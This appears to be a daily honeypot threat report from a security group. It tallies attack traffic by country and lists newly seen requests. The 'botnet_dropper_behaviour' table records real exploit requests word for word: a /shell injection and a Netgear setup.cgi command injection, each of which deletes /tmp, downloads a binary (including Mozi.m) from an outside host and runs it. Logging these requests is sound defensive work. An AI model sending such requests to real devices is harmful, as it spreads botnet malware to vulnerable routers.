Skip to main content
  1. Daily-Posts/

Report: 2025-07-04

·350 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-07-04
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 2 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 15 new requests that have never been observed before (these were added to the monitored request database.).

A total of 759 requests were recorded during the day, originating from 2 different countries, with a peak of 285 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
47.101.204.123GET /shell?cd+/tmp;rm+-rf+*;wget+ 129.159.107.197/jaws;sh+/tmp/jaws HTTP/1.1
36.255.4.164GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://36.255.4.164:52815/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
1881GET /shell?uname%20-a HTTP/1.1
2151\x04\x01\x01\xBB\x00\x00\x00\x01\x00checkip.amazonaws.com\x00
2161\x04\x01\x01\xBB\x00\x00\x00\x01\x00ipinfo.io\x00
2171\x04\x01\x01\xBB\x00\x00\x00\x01\x00ip.seeip.org\x00
2181\x04\x01\x01\xBB\x00\x00\x00\x01\x00api.myip.com\x00
2201\x04\x01\x01\xBB\x00\x00\x00\x01\x00ipv4.icanhazip.com\x00
2211\x04\x01\x01\xBB\x00\x00\x00\x01\x00ifconfig.me\x00
2221\x04\x01\x01\xBB\x00\x00\x00\x01\x00httpbin.org\x00
2231CONNECT checkip.amazonaws.com:443 HTTP/1.0
2241CONNECT httpbin.org:443 HTTP/1.0
2261CONNECT ip.seeip.org:443 HTTP/1.0
2271CONNECT ifconfig.me:443 HTTP/1.0
2281CONNECT ipinfo.io:443 HTTP/1.0
2291CONNECT api.myip.com:443 HTTP/1.0
2301CONNECT ipv4.icanhazip.com:443 HTTP/1.0

country_iso_code
#

number_of_occurencecountry_iso_code
0285US
196HK
240BG
336CA
434GB
532JP
630NL
729DE
827VN
915SC
1013ZA
1111AU
1210GH
138BR
147SG
157IN
167LT
176IL
186PL
196AO
206CN
215FR
224BE
234EE
243UA
253ES
263KR
273KZ
282MU
292RO
302IE
312KW
322MY
332MM
342TW
352RU
362SE
371HU
381GE
391AZ
401CO
411IR

Related

Report: 2025-07-03
·384 words
Repport Daily
Report: 2025-07-02
·450 words
Repport Daily
Report: 2025-07-01
·339 words
Repport Daily